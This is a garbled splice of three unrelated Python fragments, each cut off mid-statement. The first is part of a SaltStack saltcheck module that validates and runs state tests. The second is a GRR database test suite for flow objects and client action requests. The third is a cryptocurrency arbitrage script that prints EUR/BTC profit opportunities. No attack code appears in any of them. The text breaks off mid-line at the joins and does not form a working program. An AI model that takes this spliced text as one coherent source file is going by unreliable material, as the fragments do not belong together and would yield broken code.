rm -rf dest-dir
salt cp.get_dir salt://STATE/saltcheck-tests dest-dir'''
__salt__['file.remove'](dirpath)
mypath_list = dirpath.split(os.sep)
mypath_list = [i for i in mypath_list if i != ''] # removing empty chars
state = mypath_list[6:]
state = os.path.join(*state)
source = "salt://" + state
dest = dirpath
__salt__['cp.get_dir'](source, dirpath)
return
class SaltCheck(object):
'''
This class implements the saltcheck
'''
def __init__(self):
# self.sls_list_top = []
self.sls_list_state = []
self.modules = []
self.results_dict = {}
self.results_dict_summary = {}
self.assertions_list = '''assertEqual assertNotEqual
assertTrue assertFalse
assertIn assertNotIn
assertGreater
assertGreaterEqual
assertLess assertLessEqual
assertEmpty assertNotEmpty'''.split()
self.auto_update_master_cache = _get_auto_update_cache_value
__opts__ = salt.config.minion_config('/etc/salt/minion')
__opts__['file_client'] = 'local'
self.salt_lc = salt.client.Caller(mopts=__opts__)
if self.auto_update_master_cache:
update_master_cache()
def __is_valid_test(self, test_dict):
'''Determine if a test contains:
a test name,
a valid module and function,
a valid assertion,
an expected return value - if assertion type requires it'''
# 6 points needed for standard test
# 4 points needed for test with assertion not requiring expected return
tots = 0
skip = test_dict.get('skip', False)
m_and_f = test_dict.get('module_and_function', None)
assertion = test_dict.get('assertion', None)
exp_ret_key = 'expected-return' in test_dict.keys()
exp_ret_val = test_dict.get('expected-return', None)
log.info("__is_valid_test has test: {}".format(test_dict))
if skip:
required_total = 0
elif m_and_f in ["saltcheck.state_apply"]:
required_total = 2
assertion = "assertEmpty"
elif assertion in ["assertEmpty",
"assertNotEmpty",
"assertTrue",
"assertFalse"]:
required_total = 4
else:
required_total = 6
if m_and_f:
tots += 1
module, function = m_and_f.split('.')
if _is_valid_module(module):
tots += 1
if _is_valid_function(module, function):
tots += 1
log.info("__is_valid_test has valid m_and_f")
if assertion in self.assertions_list:
log.info("__is_valid_test has valid_assertion")
tots += 1
if exp_ret_key:
tots += 1
if exp_ret_val is not None:
tots += 1
# log the test score for debug purposes
log.info("__test score: {} and required: {}".format(tots, required_total))
return tots >= required_total
def call_salt_command(self,
fun,
args,
kwargs,
assertion_section):
'''Generic call of salt Caller command'''
value = False
try:
if args and kwargs:
value = self.salt_lc.cmd(fun, *args, **kwargs)
elif args and not kwargs:
value = self.salt_lc.cmd(fun, *args)
elif not args and kwargs:
value = self.salt_lc.cmd(fun, **kwargs)
else:
value = self.salt_lc.cmd(fun)
except salt.exceptions.SaltException:
raise
except Exception:
raise
if type(value) == dict and assertion_section:
return value.get(assertion_section, False)
else:
return value
def run_test(self, test_dict):
'''Run a single saltcheck test'''
start = time.time()
if self.__is_valid_test(test_dict):
skip = test_dict.get('skip', False)
if skip:
return {'status': 'Skip', 'duration': 0.0}
mod_and_func = test_dict['module_and_function']
assertion_section = test_dict.get('assertion_section', None)
args = test_dict.get('args', None)
kwargs = test_dict.get('kwargs', None)
pillar_data = test_dict.get('pillar-data', None)
if pillar_data:
if not kwargs:
kwargs = {}
kwargs['pillar'] = pillar_data
else:
# make sure we clean pillar from previous test
if kwargs:
try:
kwargs.pop('pillar')
except:
pass
if mod_and_func in ["saltcheck.state_apply"]:
assertion = "assertEmpty"
else:
assertion = test_dict['assertion']
expected_return = test_dict.get('expected-return', None)
actual_return = self.call_salt_command(mod_and_func, args, kwargs, assertion_section)
if assertion not in ["assertIn", "assertNotIn", "assertEmpty", "assertNotEmpty",
"assertTrue", "assertFalse"]:
expected_return = self.cast_expected_to_returned_type(expected_return, actual_return)
if assertion == "assertEqual":
value = self.__assert_equal(expected_return, actual_return)
elif assertion == "assertNotEqual":
value = self.__assert_not_equal(expected_return, actual_return)
elif assertion == "assertTrue":
value = self.__assert_true(actual_return)
elif assertion == "assertFalse":
value = self.__assert_false(actual_return)
elif assertion == "assertIn":
value = self.__assert_in(expected_return, actual_return)
elif assertion == "assertNotIn":
value = self.__assert_not_in(expected_return, actual_return)
elif assertion == "assertGreater":
value = self.__assert_greater(expected_return, actual_return)
elif assertion == "assertGreaterEqual":
value = self.__assert_greater_equal(expected_return, actual_return)
elif assertion == "assertLess":
value = self.__assert_less(expected_return, actual_return)
elif assertion == "assertLessEqual":
value = self.__assert_less_equal(expected_return, actual_return)
elif assertion == "assertEmpty":
value = self.__assert_empty(actual_return)
elif assertion == "assertNotEmpty":
value = self.__assert_not_empty(actual_return)
else:
value = "Fail - bas assertion"
else:
value = "Fail - | |
#!/usr/bin/env python
# Lint as: python3
# -*- encoding: utf-8 -*-
"""Tests for the flow database api."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import queue
import random
import time
import mock
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import file_finder as rdf_file_finder
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.util import compatibility
from grr_response_server import flow
from grr_response_server.databases import db
from grr_response_server.flows import file
from grr_response_server.rdfvalues import flow_objects as rdf_flow_objects
from grr_response_server.rdfvalues import flow_runner as rdf_flow_runner
from grr_response_server.rdfvalues import hunt_objects as rdf_hunt_objects
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import test_lib
class DatabaseTestFlowMixin(object):
"""An abstract class for testing db.Database implementations.
This mixin adds methods to test the handling of flows.
"""
def _SetupClient(self, client_id=None):
client_id = client_id or u"C.1234567890123456"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
return client_id
def _SetupClientAndFlow(self, client_id=None, **additional_flow_args):
client_id = self._SetupClient(client_id)
flow_id = flow.RandomFlowId()
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
create_time=rdfvalue.RDFDatetime.Now(),
**additional_flow_args)
self.db.WriteFlowObject(rdf_flow)
return client_id, flow_id
def _SetupUser(self, username="foo"):
self.db.WriteGRRUser(username)
return username
def testClientActionRequestStorage(self):
client_id, flow_id = self._SetupClientAndFlow()
self.db.WriteFlowRequests([
rdf_flow_objects.FlowRequest(
client_id=client_id, flow_id=flow_id, request_id=1)
])
req = rdf_flows.ClientActionRequest(
client_id=client_id, flow_id=flow_id, request_id=1)
self.db.WriteClientActionRequests([req])
read_reqs = self.db.ReadAllClientActionRequests(client_id)
self.assertLen(read_reqs, 1)
self.assertEqual(req, read_reqs[0])
self.db.DeleteClientActionRequests([req])
read_reqs = self.db.ReadAllClientActionRequests(client_id)
self.assertEmpty(read_reqs)
# Extra delete should not raise.
self.db.DeleteClientActionRequests([req])
# Deleting the same message multiple times is an error.
with self.assertRaises(ValueError):
self.db.DeleteClientActionRequests([req, req])
def testWriteClientActionRequestsRaisesOnUnknownRequest(self):
req = rdf_flows.ClientActionRequest(
client_id=u"C.1234567890000000", flow_id="ABCD1234", request_id=5)
with self.assertRaises(db.AtLeastOneUnknownRequestError):
self.db.WriteClientActionRequests([req])
def testClientActionRequestUpdate(self):
client_id, flow_id = self._SetupClientAndFlow()
req = rdf_flows.ClientActionRequest(
client_id=client_id, flow_id=flow_id, request_id=1)
self.db.WriteFlowRequests([
rdf_flow_objects.FlowRequest(
client_id=client_id, flow_id=flow_id, request_id=1)
])
cpu_limit = req.cpu_limit_ms
self.assertGreater(cpu_limit, 1000000)
for _ in range(5):
req.cpu_limit_ms -= 100000
self.db.WriteClientActionRequests([req])
read_reqs = self.db.ReadAllClientActionRequests(client_id)
self.assertLen(read_reqs, 1)
self.assertEqual(req, read_reqs[0])
def testClientActionRequestLeasing(self):
client_id, flow_id = self._SetupClientAndFlow()
flow_requests = []
client_requests = []
for i in range(10):
flow_requests.append(
rdf_flow_objects.FlowRequest(
client_id=client_id, flow_id=flow_id, request_id=i))
client_requests.append(
rdf_flows.ClientActionRequest(
client_id=client_id, flow_id=flow_id, request_id=i))
lease_time = rdfvalue.Duration.From(5, rdfvalue.MINUTES)
self.db.WriteFlowRequests(flow_requests)
self.db.WriteClientActionRequests(client_requests)
t0 = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100000)
with test_lib.FakeTime(t0):
t0_expiry = t0 + lease_time
leased = self.db.LeaseClientActionRequests(
client_id, lease_time=lease_time, limit=5)
self.assertLen(leased, 5)
for request in leased:
self.assertEqual(request.leased_until, t0_expiry)
self.assertEqual(request.leased_by, utils.ProcessIdString())
t1 = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100000 + 100)
with test_lib.FakeTime(t1):
t1_expiry = t1 + lease_time
leased = self.db.LeaseClientActionRequests(
client_id, lease_time=lease_time, limit=5)
self.assertLen(leased, 5)
for request in leased:
self.assertEqual(request.leased_until, t1_expiry)
self.assertEqual(request.leased_by, utils.ProcessIdString())
# Nothing left to lease.
leased = self.db.LeaseClientActionRequests(
client_id, lease_time=lease_time, limit=2)
self.assertEmpty(leased)
read = self.db.ReadAllClientActionRequests(client_id)
self.assertLen(read, 10)
for r in read:
self.assertEqual(r.leased_by, utils.ProcessIdString())
self.assertLen([r for r in read if r.leased_until == t0_expiry], 5)
self.assertLen([r for r in read if r.leased_until == t1_expiry], 5)
# Half the leases expired.
t2 = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100000 + 350)
with test_lib.FakeTime(t2):
leased = self.db.LeaseClientActionRequests(
client_id, lease_time=lease_time)
self.assertLen(leased, 5)
# All of them expired.
t3 = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(100000 + 10350)
with test_lib.FakeTime(t3):
leased = self.db.LeaseClientActionRequests(
client_id, lease_time=lease_time)
self.assertLen(leased, 10)
def testClientActionRequestsTTL(self):
client_id, flow_id = self._SetupClientAndFlow()
flow_requests = []
client_requests = []
for i in range(10):
flow_requests.append(
rdf_flow_objects.FlowRequest(
client_id=client_id, flow_id=flow_id, request_id=i))
client_requests.append(
rdf_flows.ClientActionRequest(
client_id=client_id, flow_id=flow_id, request_id=i))
self.db.WriteFlowRequests(flow_requests)
self.db.WriteClientActionRequests(client_requests)
reqs = self.db.ReadAllClientActionRequests(client_id)
self.assertLen(reqs, 10)
for request in reqs:
self.assertEqual(request.ttl, db.Database.CLIENT_MESSAGES_TTL)
now = rdfvalue.RDFDatetime.Now()
lease_time = rdfvalue.Duration.From(60, rdfvalue.SECONDS)
for i in range(db.Database.CLIENT_MESSAGES_TTL):
now += rdfvalue.Duration.From(120, rdfvalue.SECONDS)
with test_lib.FakeTime(now):
leased = self.db.LeaseClientActionRequests(
client_id, lease_time=lease_time, limit=10)
self.assertLen(leased, 10)
# Check that the ttl is read.
for request in leased:
self.assertEqual(request.ttl, db.Database.CLIENT_MESSAGES_TTL - i - 1)
reqs = self.db.ReadAllClientActionRequests(client_id)
self.assertLen(reqs, 10)
for request in reqs:
self.assertEqual(request.ttl, db.Database.CLIENT_MESSAGES_TTL - i - 1)
now += rdfvalue.Duration.From(120, rdfvalue.SECONDS)
with test_lib.FakeTime(now):
leased = self.db.LeaseClientActionRequests(
client_id, lease_time=lease_time, limit=10)
self.assertEmpty(leased)
# ReadAllClientActionRequests includes also requests whose TTL has
# expired. Make sure that the requests have been deleted from the db.
self.assertEqual(self.db.ReadAllClientActionRequests(client_id), [])
def testFlowWritingUnknownClient(self):
flow_id = u"1234ABCD"
client_id = u"C.1234567890123456"
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
create_time=rdfvalue.RDFDatetime.Now())
with self.assertRaises(db.UnknownClientError):
self.db.WriteFlowObject(rdf_flow)
def testFlowWriting(self):
flow_id = u"1234ABCD"
client_id = u"C.1234567890123456"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
long_flow_id=f"{client_id}/{flow_id}",
next_request_to_process=4,
create_time=rdfvalue.RDFDatetime.Now())
self.db.WriteFlowObject(rdf_flow)
read_flow = self.db.ReadFlowObject(client_id, flow_id)
# Last update time has changed, everything else should be equal.
read_flow.last_update_time = None
self.assertEqual(read_flow, rdf_flow)
# Invalid flow id or client id raises.
with self.assertRaises(db.UnknownFlowError):
self.db.ReadFlowObject(client_id, u"1234AAAA")
with self.assertRaises(db.UnknownFlowError):
self.db.ReadFlowObject(u"C.1234567890000000", flow_id)
def testFlowOverwrite(self):
flow_id = u"1234ABCD"
client_id = u"C.1234567890123456"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
next_request_to_process=4,
create_time=rdfvalue.RDFDatetime.Now())
self.db.WriteFlowObject(rdf_flow)
read_flow = self.db.ReadFlowObject(client_id, flow_id)
# Last update time has changed, everything else should be equal.
read_flow.last_update_time = None
self.assertEqual(read_flow, rdf_flow)
# Now change the flow object.
rdf_flow.next_request_to_process = 5
self.db.WriteFlowObject(rdf_flow)
read_flow_after_update = self.db.ReadFlowObject(client_id, flow_id)
self.assertEqual(read_flow_after_update.next_request_to_process, 5)
def testFlowOverwriteFailsWithAllowUpdateFalse(self):
flow_id = u"1234ABCD"
client_id = u"C.1234567890123456"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
next_request_to_process=4,
create_time=rdfvalue.RDFDatetime.Now())
self.db.WriteFlowObject(rdf_flow, allow_update=False)
# Now change the flow object.
rdf_flow.next_request_to_process = 5
with self.assertRaises(db.FlowExistsError) as context:
self.db.WriteFlowObject(rdf_flow, allow_update=False)
self.assertEqual(context.exception.client_id, client_id)
self.assertEqual(context.exception.flow_id, flow_id)
read_flow_after_update = self.db.ReadFlowObject(client_id, flow_id)
self.assertEqual(read_flow_after_update.next_request_to_process, 4)
def testFlowTimestamp(self):
client_id = "C.0123456789012345"
flow_id = "0F00B430"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
before_timestamp = rdfvalue.RDFDatetime.Now()
flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
self.db.WriteFlowObject(flow_obj)
after_timestamp = rdfvalue.RDFDatetime.Now()
flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
self.assertBetween(flow_obj.create_time, before_timestamp, after_timestamp)
def testFlowTimestampWithMissingCreationTime(self):
client_id = "C.0123456789012345"
flow_id = "0F00B430"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
before_timestamp = rdfvalue.RDFDatetime.Now()
flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
flow_obj.create_time = None
self.db.WriteFlowObject(flow_obj)
after_timestamp = rdfvalue.RDFDatetime.Now()
flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
self.assertBetween(flow_obj.create_time, before_timestamp, after_timestamp)
def testFlowNameWithMissingNameInProtobuf(self):
client_id = "C.0123456789012345"
flow_id = "0F00B430"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
flow_obj.flow_class_name = "Quux"
self.db.WriteFlowObject(flow_obj)
flow_obj.flow_class_name = None
self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
self.assertEqual(flow_obj.flow_class_name, "Quux")
def testFlowKeyMetadataUnchangable(self):
client_id = "C.0123456789012345"
flow_id = "0F00B430"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
flow_obj.long_flow_id = f"{client_id}/{flow_id}"
self.db.WriteFlowObject(flow_obj)
flow_obj.client_id = "C.0123456789ABCDEF"
flow_obj.flow_id = "0B43F0000"
flow_obj.long_flow_id = f"{flow_obj.client_id}/{flow_obj.flow_id}"
self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
self.assertEqual(flow_obj.client_id, client_id)
self.assertEqual(flow_obj.flow_id, flow_id)
self.assertEqual(flow_obj.long_flow_id, f"{client_id}/{flow_id}")
def testFlowParentMetadataUnchangable(self):
client_id = "C.0123456789012345"
flow_id = "0F00B430"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
flow_obj.parent_flow_id = "0B43F000"
flow_obj.parent_hunt_id = "48151623"
self.db.WriteFlowObject(flow_obj)
flow_obj.parent_flow_id = "08133780"
flow_obj.parent_hunt_id = "01081080"
self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
self.assertEqual(flow_obj.parent_flow_id, "0B43F000")
self.assertEqual(flow_obj.parent_hunt_id, "48151623")
def testFlowNameUnchangable(self):
client_id = "C.0123456789012345"
flow_id = "0F00B430"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
flow_obj.flow_class_name = "Quux"
self.db.WriteFlowObject(flow_obj)
flow_obj.flow_class_name = "Norf"
self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
self.assertEqual(flow_obj.flow_class_name, "Quux")
def testFlowCreatorUnchangable(self):
client_id = "C.0123456789012345"
flow_id = "0F00B430"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
flow_obj.creator = "norf"
self.db.WriteFlowObject(flow_obj)
flow_obj.creator = "thud"
self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
self.assertEqual(flow_obj.creator, "norf")
def testFlowCreatorUnsetInProtobuf(self):
client_id = "C.0123456789012345"
flow_id = "0F00B430"
self.db.WriteClientMetadata(client_id, fleetspeak_enabled=False)
flow_obj = rdf_flow_objects.Flow(client_id=client_id, flow_id=flow_id)
flow_obj.creator = "norf"
self.db.WriteFlowObject(flow_obj)
flow_obj.creator = None
self.db.UpdateFlow(client_id=client_id, flow_id=flow_id, flow_obj=flow_obj)
flow_obj = self.db.ReadFlowObject(client_id=client_id, flow_id=flow_id)
self.assertEqual(flow_obj.creator, "norf")
def testReadAllFlowObjects(self):
client_id_1 = "C.1111111111111111"
client_id_2 = "C.2222222222222222"
self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
self.db.WriteClientMetadata(client_id_2, fleetspeak_enabled=False)
# Write a flow and a child flow for client 1.
flow1 = rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="000A0001",
create_time=rdfvalue.RDFDatetime.Now())
self.db.WriteFlowObject(flow1)
flow2 = rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="000A0002",
parent_flow_id="000A0001",
create_time=rdfvalue.RDFDatetime.Now())
self.db.WriteFlowObject(flow2)
# Same flow id for client 2.
flow3 = rdf_flow_objects.Flow(
client_id=client_id_2,
flow_id="000A0001",
create_time=rdfvalue.RDFDatetime.Now())
self.db.WriteFlowObject(flow3)
flows = self.db.ReadAllFlowObjects()
self.assertCountEqual([f.flow_id for f in flows],
["000A0001", "000A0002", "000A0001"])
def testReadAllFlowObjectsWithMinCreateTime(self):
now = rdfvalue.RDFDatetime.Now()
client_id_1 = "C.1111111111111111"
self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="0000001A",
create_time=now - rdfvalue.Duration.From(2, rdfvalue.HOURS)))
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="0000001B",
create_time=now - rdfvalue.Duration.From(1, rdfvalue.HOURS)))
flows = self.db.ReadAllFlowObjects(
min_create_time=now - rdfvalue.Duration.From(1, rdfvalue.HOURS))
self.assertEqual([f.flow_id for f in flows], ["0000001B"])
def testReadAllFlowObjectsWithMaxCreateTime(self):
now = rdfvalue.RDFDatetime.Now()
client_id_1 = "C.1111111111111111"
self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="0000001A",
create_time=now - rdfvalue.Duration.From(2, rdfvalue.HOURS)))
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="0000001B",
create_time=now - rdfvalue.Duration.From(1, rdfvalue.HOURS)))
flows = self.db.ReadAllFlowObjects(
max_create_time=now - rdfvalue.Duration.From(2, rdfvalue.HOURS))
self.assertEqual([f.flow_id for f in flows], ["0000001A"])
def testReadAllFlowObjectsWithClientID(self):
now = rdfvalue.RDFDatetime.Now()
client_id_1 = "C.1111111111111111"
client_id_2 = "C.2222222222222222"
self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
self.db.WriteClientMetadata(client_id_2, fleetspeak_enabled=False)
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1, flow_id="0000001A", create_time=now))
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_2, flow_id="0000001B", create_time=now))
flows = self.db.ReadAllFlowObjects(client_id=client_id_1)
self.assertEqual([f.flow_id for f in flows], ["0000001A"])
def testReadAllFlowObjectsWithoutChildren(self):
now = rdfvalue.RDFDatetime.Now()
client_id_1 = "C.1111111111111111"
self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1, flow_id="0000001A", create_time=now))
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="0000001B",
parent_flow_id="0000001A",
create_time=now))
flows = self.db.ReadAllFlowObjects(include_child_flows=False)
self.assertEqual([f.flow_id for f in flows], ["0000001A"])
def testReadAllFlowObjectsWithAllConditions(self):
now = rdfvalue.RDFDatetime.Now()
client_id_1 = "C.1111111111111111"
client_id_2 = "C.2222222222222222"
self.db.WriteClientMetadata(client_id_1, fleetspeak_enabled=False)
self.db.WriteClientMetadata(client_id_2, fleetspeak_enabled=False)
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1, flow_id="0000000A", create_time=now))
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="0000000B",
parent_flow_id="0000000A",
create_time=now))
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="0000000C",
create_time=now - rdfvalue.Duration.From(1, rdfvalue.SECONDS)))
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_1,
flow_id="0000000D",
create_time=now + rdfvalue.Duration.From(1, rdfvalue.SECONDS)))
self.db.WriteFlowObject(
rdf_flow_objects.Flow(
client_id=client_id_2, flow_id="0000000E", create_time=now))
flows = self.db.ReadAllFlowObjects(
client_id=client_id_1,
min_create_time=now,
max_create_time=now,
include_child_flows=False)
self.assertEqual([f.flow_id for f in flows], ["0000000A"])
def testUpdateUnknownFlow(self):
_, flow_id = self._SetupClientAndFlow()
crash_info = rdf_client.ClientCrash(crash_message="oh no")
with self.assertRaises(db.UnknownFlowError):
self.db.UpdateFlow(
u"C.1234567890AAAAAA", flow_id, client_crash_info=crash_info)
def testFlowUpdateChangesAllFields(self):
client_id, flow_id = self._SetupClientAndFlow()
flow_obj = self.db.ReadFlowObject(client_id, flow_id)
flow_obj.cpu_time_used.user_cpu_time = 0.5
flow_obj.cpu_time_used.system_cpu_time = 1.5
flow_obj.num_replies_sent = 10
flow_obj.network_bytes_sent = 100
self.db.UpdateFlow(client_id, flow_id, flow_obj=flow_obj)
read_flow = self.db.ReadFlowObject(client_id, flow_id)
# Last | |
+str(currDCRBTCAsk) +" -> Sell DCR for " +str(currDCREURBid) +"€ = " +str("%.3f" % arb12_profitA))
arb12_profitB = safe_division((currDCRBTCBid*currBTCEURBid - currDCREURAsk)*100.0,currDCREURAsk)
if arb12_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy DCR " +str(currDCREURAsk) +"€ -> Sell DCR " +str(currDCRBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb12_profitB))
#DGB
arb13_profitA = safe_division((currDGBEURBid - (currDGBBTCAsk*currBTCEURAsk))*100.0,currDGBBTCAsk*currBTCEURAsk)
if arb13_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy DGB " +str(currDGBBTCAsk) +" -> Sell DGB for " +str(currDGBEURBid) +"€ = " +str("%.3f" % arb13_profitA))
arb13_profitB = safe_division((currDGBBTCBid*currBTCEURBid - currDGBEURAsk)*100.0,currDGBEURAsk)
if arb13_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy DGB " +str(currDGBEURAsk) +"€ -> Sell DGB " +str(currDGBBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb13_profitB))
#ELF
arb14_profitA = safe_division((currELFEURBid - (currELFBTCAsk*currBTCEURAsk))*100.0,currELFBTCAsk*currBTCEURAsk)
if arb14_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy ELF " +str(currELFBTCAsk) +" -> Sell ELF for " +str(currELFEURBid) +"€ = " +str("%.3f" % arb14_profitA))
arb14_profitB = safe_division((currELFBTCBid*currBTCEURBid - currELFEURAsk)*100.0,currELFEURAsk)
if arb14_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy ELF " +str(currELFEURAsk) +"€ -> Sell ELF " +str(currELFBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb14_profitB))
#ENJ
arb15_profitA = safe_division((currENJEURBid - (currENJBTCAsk*currBTCEURAsk))*100.0,currENJBTCAsk*currBTCEURAsk)
if arb15_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy ENJ " +str(currENJBTCAsk) +" -> Sell ENJ for " +str(currENJEURBid) +"€ = " +str("%.3f" % arb15_profitA))
arb15_profitB = safe_division((currENJBTCBid*currBTCEURBid - currENJEURAsk)*100.0,currENJEURAsk)
if arb15_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy ENJ " +str(currENJEURAsk) +"€ -> Sell ENJ " +str(currENJBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb15_profitB))
#EOS
arb16_profitA = safe_division((currEOSEURBid - (currEOSBTCAsk*currBTCEURAsk))*100.0,currEOSBTCAsk*currBTCEURAsk)
if arb16_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy EOS " +str(currEOSBTCAsk) +" -> Sell EOS for " +str(currEOSEURBid) +"€ = " +str("%.3f" % arb16_profitA))
arb16_profitB = safe_division((currEOSBTCBid*currBTCEURBid - currEOSEURAsk)*100.0,currEOSEURAsk)
if arb16_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy EOS " +str(currEOSEURAsk) +"€ -> Sell EOS " +str(currEOSBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb16_profitB))
#ETC
arb17_profitA = safe_division((currETCEURBid - (currETCBTCAsk*currBTCEURAsk))*100.0,currETCBTCAsk*currBTCEURAsk)
if arb17_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy ETC " +str(currETCBTCAsk) +" -> Sell ETC for " +str(currETCEURBid) +"€ = " +str("%.3f" % arb17_profitA))
arb17_profitB = safe_division((currETCBTCBid*currBTCEURBid - currETCEURAsk)*100.0,currETCEURAsk)
if arb17_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy ETC " +str(currETCEURAsk) +"€ -> Sell ETC " +str(currETCBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb17_profitB))
#GAS
arb18_profitA = safe_division((currGASEURBid - (currGASBTCAsk*currBTCEURAsk))*100.0,currGASBTCAsk*currBTCEURAsk)
if arb18_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy GAS " +str(currGASBTCAsk) +" -> Sell GAS for " +str(currGASEURBid) +"€ = " +str("%.3f" % arb18_profitA))
arb18_profitB = safe_division((currGASBTCBid*currBTCEURBid - currGASEURAsk)*100.0,currGASEURAsk)
if arb18_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy GAS " +str(currGASEURAsk) +"€ -> Sell GAS " +str(currGASBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb18_profitB))
#GNT
arb19_profitA = safe_division((currGNTEURBid - (currGNTBTCAsk*currBTCEURAsk))*100.0,currGNTBTCAsk*currBTCEURAsk)
if arb19_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy GNT " +str(currGNTBTCAsk) +" -> Sell GNT for " +str(currGNTEURBid) +"€ = " +str("%.3f" % arb19_profitA))
arb19_profitB = safe_division((currGNTBTCBid*currBTCEURBid - currGNTEURAsk)*100.0,currGNTEURAsk)
if arb19_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy GNT " +str(currGNTEURAsk) +"€ -> Sell GNT " +str(currGNTBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb19_profitB))
#HOT
